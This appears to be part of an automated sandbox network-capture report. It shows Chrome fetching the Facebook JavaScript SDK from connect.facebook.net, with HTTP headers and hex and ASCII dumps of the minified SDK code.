                                                                                                                                                                                                        permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                        cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                                                                                                                                        cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC874INData Raw: 72 65 70 6f 72 74 2d 74 6f 3a 20 7b 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 62 72 6f 77 73 65 72 5f 72 65 70 6f 72 74 69 6e 67 5c 2f 63 6f 6f 70 5c 2f 3f 6d 69 6e 69 6d 69 7a 65 3d 30 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 6f 6f 70 5f 72 65 70 6f 72 74 22 2c 22 69 6e 63 6c 75 64 65 5f 73 75 62 64 6f 6d 61 69 6e 73 22 3a 74 72 75 65 7d 2c 20 7b 22 6d 61 78 5f 61 67 65 22 3a 38 36 34 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 62 72 6f 77 73 65 72 5f 72 65 70 6f 72 74 69 6e 67 5c 2f 63
                                                                                                                                                                                                        Data Ascii: report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/c
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC1INData Raw: 2f
                                                                                                                                                                                                        Data Ascii: /
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC15059INData Raw: 2a 31 37 32 35 30 33 31 33 33 36 2c 2c 4a 49 54 20 43 6f 6e 73 74 72 75 63 74 69 6f 6e 3a 20 76 31 30 31 36 31 30 38 32 37 32 2c 65 6e 5f 55 53 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 0a 20 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 20 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20
                                                                                                                                                                                                        Data Ascii: *1725031336,,JIT Construction: v1016108272,en_US*//** * Copyright (c) 2017-present, Facebook, Inc. All rights reserved. * * You are hereby granted a non-exclusive, worldwide, royalty-free license to use, * copy, modify, and distribute this software
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC16384INData Raw: 7d 62 2b 3d 65 3f 66 5b 63 5d 3a 61 2e 63 68 61 72 41 74 28 63 29 7d 7d 72 65 74 75 72 6e 20 62 2b 27 22 27 7d 2c 49 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 76 61 72 20 68 2c 69 2c 6a 2c 6b 2c 6d 2c 72 2c 73 2c 74 2c 7a 2c 42 3b 74 72 79 7b 68 3d 62 5b 61 5d 7d 63 61 74 63 68 28 61 29 7b 7d 69 66 28 74 79 70 65 6f 66 20 68 3d 3d 22 6f 62 6a 65 63 74 22 26 26 68 29 7b 69 3d 6e 2e 63 61 6c 6c 28 68 29 3b 69 66 28 69 3d 3d 75 26 26 21 6f 2e 63 61 6c 6c 28 68 2c 22 74 6f 4a 53 4f 4e 22 29 29 69 66 28 68 3e 2d 31 2f 30 26 26 68 3c 31 2f 30 29 7b 69 66 28 43 29 7b 6d 3d 41 28 68 2f 38 36 34 65 35 29 3b 66 6f 72 28 6a 3d 41 28 6d 2f 33 36 35 2e 32 34 32 35 29 2b 31 39 37 30 2d 31 3b 43 28 6a 2b 31 2c 30 29 3c 3d 6d 3b 6a 2b 2b
                                                                                                                                                                                                        Data Ascii: }b+=e?f[c]:a.charAt(c)}}return b+'"'},I=function(a,b,c,d,e,f,g){var h,i,j,k,m,r,s,t,z,B;try{h=b[a]}catch(a){}if(typeof h=="object"&&h){i=n.call(h);if(i==u&&!o.call(h,"toJSON"))if(h>-1/0&&h<1/0){if(C){m=A(h/864e5);for(j=A(m/365.2425)+1970-1;C(j+1,0)<=m;j++
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC16384INData Raw: 65 64 22 3f 67 6c 6f 62 61 6c 3a 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 77 69 6e 64 6f 77 3a 74 79 70 65 6f 66 20 74 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 74 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 7b 7d 29 3b 20 20 20 20 20 20 5f 5f 64 28 22 4a 53 53 44 4b 43 61 6e 76 61 73 50 72 65 66 65 74 63 68 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 65 78 63 6c 75 64 65 64 41 70 70 49 64 73 22 3a 5b 31 34 34 39 35 39 36 31 35 35 37 36 34 36 36 2c 37 36 38 36 39 31 33 30 33 31 34 39 37 38 36 2c 33 32 30 35 32 38 39 34 31 33 39 33 37 32 33 5d 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 35 30 30 7d
                                                                                                                                                                                                        Data Ascii: ed"?global:typeof window!=="undefined"?window:typeof this!=="undefined"?this:typeof self!=="undefined"?self:{}); __d("JSSDKCanvasPrefetcherConfig",[],{"enabled":true,"excludedAppIds":[144959615576466,768691303149786,320528941393723],"sampleRate":500}
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC16384INData Raw: 6e 28 61 29 7b 6b 5b 61 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 5b 61 5d 7d 7d 29 3b 6b 2e 6d 6f 62 69 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 2e 69 70 68 6f 6e 65 7c 7c 67 2e 69 70 61 64 7c 7c 67 2e 61 6e 64 72 6f 69 64 7c 7c 68 7d 3b 6b 2e 6d 54 6f 75 63 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 2e 61 6e 64 72 6f 69 64 7c 7c 67 2e 69 70 68 6f 6e 65 7c 7c 67 2e 69 70 61 64 7d 3b 6b 2e 66 61 63 65 62 6f 6f 6b 49 6e 41 70 70 42 72 6f 77 73 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 2e 6e 61 74 69 76 65 41 70 70 7c 7c 67 2e 6e 61 74 69 76 65 41 6e 64 72 6f 69 64 41 70 70 7d 3b 6b 2e 69 6e 41 70 70 42 72 6f 77 73 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75
                                                                                                                                                                                                        Data Ascii: n(a){k[a]=function(){return g[a]}});k.mobile=function(){return g.iphone||g.ipad||g.android||h};k.mTouch=function(){return g.android||g.iphone||g.ipad};k.facebookInAppBrowser=function(){return g.nativeApp||g.nativeAndroidApp};k.inAppBrowser=function(){retu
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC1500INData Raw: 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 62 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 63 3d 6e 65 77 20 41 72 72 61 79 28 62 29 2c 64 3d 30 3b 64 3c 62 3b 64 2b 2b 29 63 5b 64 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 64 5d 3b 69 66 28 63 2e 6c 65 6e 67 74 68 3c 32 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 44 65 66 61 75 6c 74 20 76 61 6c 75 65 20 69 73 20 72 65 71 75 69 72 65 64 22 29 3b 76 61 72 20 65 3d 63 5b 30 5d 2c 66 3d 63 5b 31 5d 3b 72 65 74 75 72 6e 20 67 28 61 2c 65 2c 66 29 7d 7d 66 2e 63 72 65 61 74 65 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 73 64 6b 2e 66 65 61 74 75 72 65 22 2c 5b 22 4a 53 53 44 4b 43 6f 6e 66 69 67 22 2c 22 73 64 6b 2e 46 65 61 74 75 72 65 46 75 6e 63 74 6f 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                        Data Ascii: tion(){for(var b=arguments.length,c=new Array(b),d=0;d<b;d++)c[d]=arguments[d];if(c.length<2)throw new Error("Default value is required");var e=c[0],f=c[1];return g(a,e,f)}}f.create=a}),66);__d("sdk.feature",["JSSDKConfig","sdk.FeatureFunctor"],(function
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC14884INData Raw: 61 2e 74 6f 53 74 72 69 6e 67 28 29 29 3f 63 28 22 73 64 6b 2e 45 72 72 6f 72 48 61 6e 64 6c 69 6e 67 22 29 2e 75 6e 67 75 61 72 64 28 61 29 3a 61 7d 76 61 72 20 66 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 2e 6d 61 70 28 64 29 2c 67 3d 61 2e 61 70 70 6c 79 28 65 2c 66 29 2c 68 2c 69 3d 21 30 3b 69 66 28 67 26 26 74 79 70 65 6f 66 20 67 3d 3d 3d 22 6f 62 6a 65 63 74 22 29 7b 68 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 67 29 3b 68 2e 5f 5f 77 72 61 70 70 65 64 3d 67 3b 66 6f 72 28 76 61 72 20 6b 20 69 6e 20 67 29 7b 76 61 72 20 6c 3d 67 5b 6b 5d 3b 69 66 28 74 79 70 65 6f 66 20 6c 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 6b 3d 3d 3d 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 63
                                                                                                                                                                                                        Data Ascii: a.toString())?c("sdk.ErrorHandling").unguard(a):a}var f=Array.prototype.slice.call(arguments).map(d),g=a.apply(e,f),h,i=!0;if(g&&typeof g==="object"){h=Object.create(g);h.__wrapped=g;for(var k in g){var l=g[k];if(typeof l!=="function"||k==="constructor")c
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC16384INData Raw: 61 74 63 68 28 2f 5c 77 2b 7c 5c 57 2b 2f 67 29 29 21 3d 6e 75 6c 6c 3f 61 3a 5b 5d 3b 76 61 72 20 62 2c 63 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 3b 66 6f 72 28 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 63 5b 61 5b 62 5d 5d 3d 28 63 5b 61 5b 62 5d 5d 7c 7c 30 29 2b 31 3b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 63 29 3b 64 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 70 61 72 73 65 49 6e 74 28 63 5b 62 5d 2c 31 30 29 2d 70 61 72 73 65 49 6e 74 28 63 5b 61 5d 2c 31 30 29 7d 29 3b 66 6f 72 28 62 3d 30 3b 62 3c 64 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 76 61 72 20 65 3d 28 62 2d 62 25 33 32 29 2f 33 32 3b 63 5b 64 5b 62 5d 5d 3d 65 3f 65 2e 74 6f 53 74 72 69 6e 67 28 33 32
                                                                                                                                                                                                        Data Ascii: atch(/\w+|\W+/g))!=null?a:[];var b,c=Object.create(null);for(b=0;b<a.length;b++)c[a[b]]=(c[a[b]]||0)+1;var d=Object.keys(c);d.sort(function(a,b){return parseInt(c[b],10)-parseInt(c[a],10)});for(b=0;b<d.length;b++){var e=(b-b%32)/32;c[d[b]]=e?e.toString(32
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC16384INData Raw: 61 6e 74 3a 28 63 3d 62 2e 62 75 6e 64 6c 65 5f 76 61 72 69 61 6e 74 29 21 3d 3d 6e 75 6c 6c 26 26 63 21 3d 3d 76 6f 69 64 20 30 3f 63 3a 6e 75 6c 6c 2c 63 6c 69 65 6e 74 54 69 6d 65 3a 58 28 61 2e 63 6c 69 65 6e 74 54 69 6d 65 29 2c 63 6f 6c 75 6d 6e 3a 61 2e 63 6f 6c 75 6d 6e 2c 63 6f 6d 70 6f 6e 65 6e 74 53 74 61 63 6b 46 72 61 6d 65 73 3a 5a 28 61 2e 63 6f 6d 70 6f 6e 65 6e 74 53 74 61 63 6b 46 72 61 6d 65 73 29 2c 65 76 65 6e 74 73 3a 61 2e 65 76 65 6e 74 73 2c 65 78 74 72 61 3a 70 61 28 61 2e 65 78 74 72 61 2c 62 2e 65 78 74 72 61 29 2c 66 6f 72 63 65 64 4b 65 79 3a 61 2e 66 6f 72 63 65 64 4b 65 79 2c 66 72 6f 6e 74 65 6e 64 5f 65 6e 76 3a 28 63 3d 62 2e 66 72 6f 6e 74 65 6e 64 5f 65 6e 76 29 21 3d 3d 6e 75 6c 6c 26 26 63 21 3d 3d 76 6f 69 64 20 30
                                                                                                                                                                                                        Data Ascii: ant:(c=b.bundle_variant)!==null&&c!==void 0?c:null,clientTime:X(a.clientTime),column:a.column,componentStackFrames:Z(a.componentStackFrames),events:a.events,extra:pa(a.extra,b.extra),forcedKey:a.forcedKey,frontend_env:(c=b.frontend_env)!==null&&c!==void 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        7192.168.2.549732157.240.0.64436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC356OUTGET /en_US/sdk.js HTTP/1.1
                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC1850INHTTP/1.1 200 OK
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Access-Control-Expose-Headers: X-FB-Content-MD5
                                                                                                                                                                                                        x-fb-content-md5: e4e48d634b312c6df47616cfe271e535
                                                                                                                                                                                                        ETag: "faf05a8a0796ed7c29d941be87a0054b"
                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        content-md5: 5OSNY0sxLG30dhbP4nHlNQ==
                                                                                                                                                                                                        Expires: Fri, 30 Aug 2024 16:35:42 GMT
                                                                                                                                                                                                        Cache-Control: public,max-age=1200,stale-while-revalidate=3600
                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                        document-policy: force-load-at-top
                                                                                                                                                                                                        permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                        cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                                                                                                                                        cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC899INData Raw: 72 65 70 6f 72 74 2d 74 6f 3a 20 7b 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 62 72 6f 77 73 65 72 5f 72 65 70 6f 72 74 69 6e 67 5c 2f 63 6f 6f 70 5c 2f 3f 6d 69 6e 69 6d 69 7a 65 3d 30 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 6f 6f 70 5f 72 65 70 6f 72 74 22 2c 22 69 6e 63 6c 75 64 65 5f 73 75 62 64 6f 6d 61 69 6e 73 22 3a 74 72 75 65 7d 2c 20 7b 22 6d 61 78 5f 61 67 65 22 3a 38 36 34 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 62 72 6f 77 73 65 72 5f 72 65 70 6f 72 74 69 6e 67 5c 2f 63
                                                                                                                                                                                                        Data Ascii: report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/c
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC601INData Raw: 2f 2a 31 37 32 35 30 33 34 35 34 32 2c 2c 4a 49 54 20 43 6f 6e 73 74 72 75 63 74 69 6f 6e 3a 20 76 31 30 31 36 31 30 38 32 37 32 2c 65 6e 5f 55 53 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 0a 20 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 20 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65
                                                                                                                                                                                                        Data Ascii: /*1725034542,,JIT Construction: v1016108272,en_US*//** * Copyright (c) 2017-present, Facebook, Inc. All rights reserved. * * You are hereby granted a non-exclusive, worldwide, royalty-free license to use, * copy, modify, and distribute this software
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC1500INData Raw: 20 63 6f 70 69 65 73 20 6f 72 20 73 75 62 73 74 61 6e 74 69 61 6c 20 70 6f 72 74 69 6f 6e 73 20 6f 66 20 74 68 65 20 73 6f 66 74 77 61 72 65 2e 0a 20 2a 0a 20 2a 20 54 48 45 20 53 4f 46 54 57 41 52 45 20 49 53 20 50 52 4f 56 49 44 45 44 20 22 41 53 20 49 53 22 2c 20 57 49 54 48 4f 55 54 20 57 41 52 52 41 4e 54 59 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 45 58 50 52 45 53 53 20 4f 52 0a 20 2a 20 49 4d 50 4c 49 45 44 2c 20 49 4e 43 4c 55 44 49 4e 47 20 42 55 54 20 4e 4f 54 20 4c 49 4d 49 54 45 44 20 54 4f 20 54 48 45 20 57 41 52 52 41 4e 54 49 45 53 20 4f 46 20 4d 45 52 43 48 41 4e 54 41 42 49 4c 49 54 59 2c 20 46 49 54 4e 45 53 53 0a 20 2a 20 46 4f 52 20 41 20 50 41 52 54 49 43 55 4c 41 52 20 50 55 52 50 4f 53 45 20 41 4e 44 20 4e 4f 4e 49 4e 46 52 49 4e
                                                                                                                                                                                                        Data Ascii: copies or substantial portions of the software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS * FOR A PARTICULAR PURPOSE AND NONINFRIN
                                                                                                                                                                                                        2024-08-30 16:15:42 UTC992INData Raw: 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 68 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 68 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6b 2c 68 29 7d 29 28 22 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 5c 2f 65 6e 5f 55 53 5c 2f 73 64 6b 2e 6a 73 3f 68 61 73 68 3d 33 65 36 64 31 39 35 31 37 37 39 35 66 35 33 62 65 35 33 32 32 63 64 36 64 66 36 35 64 66 64 31 22 2c 20 31 37 32 35 30 33 34 35 34 32 2c 20 22 46 42 22 2c 20 5b 22 41 70 70 45 76 65 6e 74 73 2e 45 76 65 6e 74 4e 61 6d 65 73 22 2c 22 41 70 70 45 76 65 6e 74 73 2e 50 61 72 61 6d 65 74 65 72 4e 61 6d 65 73 22 2c 22 41 70 70 45 76 65 6e 74 73 2e 61 63 74 69 76 61 74 65 41 70 70 22 2c 22 41 70 70 45 76 65 6e 74
                                                                                                                                                                                                        Data Ascii: gName("script")[0];h.parentNode&&h.parentNode.insertBefore(k,h)})("https:\/\/connect.facebook.net\/en_US\/sdk.js?hash=3e6d19517795f53be5322cd6df65dfd1", 1725034542, "FB", ["AppEvents.EventNames","AppEvents.ParameterNames","AppEvents.activateApp","AppEvent


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        8192.168.2.549735157.240.0.64436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:15:43 UTC394OUTGET /en_US/sdk.js?hash=cfe36e7e683e5528b12db8f17a4d3eaa HTTP/1.1
                                                                                                                                                                                                        Host: connect.facebook.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:15:44 UTC1864INHTTP/1.1 200 OK
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Access-Control-Expose-Headers: X-FB-Content-MD5
                                                                                                                                                                                                        x-fb-content-md5: 27a96471ea8b6c3cd365638da64ae45f
                                                                                                                                                                                                        ETag: "337da3f94539df75e4d15198d01e9221"
                                                                                                                                                                                                        Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        content-md5: J6lkceqLbDzTZWONpkrkXw==
                                                                                                                                                                                                        Expires: Sat, 30 Aug 2025 15:17:12 GMT
                                                                                                                                                                                                        Cache-Control: public,max-age=31536000,stale-while-revalidate=3600,immutable
                                                                                                                                                                                                        reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                        document-policy: force-load-at-top
                                                                                                                                                                                                        permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                        cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                                                                                                                                        cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        2024-08-30 16:15:44 UTC900INData Raw: 72 65 70 6f 72 74 2d 74 6f 3a 20 7b 22 6d 61 78 5f 61 67 65 22 3a 32 35 39 32 30 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 62 72 6f 77 73 65 72 5f 72 65 70 6f 72 74 69 6e 67 5c 2f 63 6f 6f 70 5c 2f 3f 6d 69 6e 69 6d 69 7a 65 3d 30 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 6f 6f 70 5f 72 65 70 6f 72 74 22 2c 22 69 6e 63 6c 75 64 65 5f 73 75 62 64 6f 6d 61 69 6e 73 22 3a 74 72 75 65 7d 2c 20 7b 22 6d 61 78 5f 61 67 65 22 3a 38 36 34 30 30 2c 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 62 72 6f 77 73 65 72 5f 72 65 70 6f 72 74 69 6e 67 5c 2f 63
                                                                                                                                                                                                        Data Ascii: report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/c
                                                                                                                                                                                                        2024-08-30 16:15:44 UTC1INData Raw: 2f
                                                                                                                                                                                                        Data Ascii: /
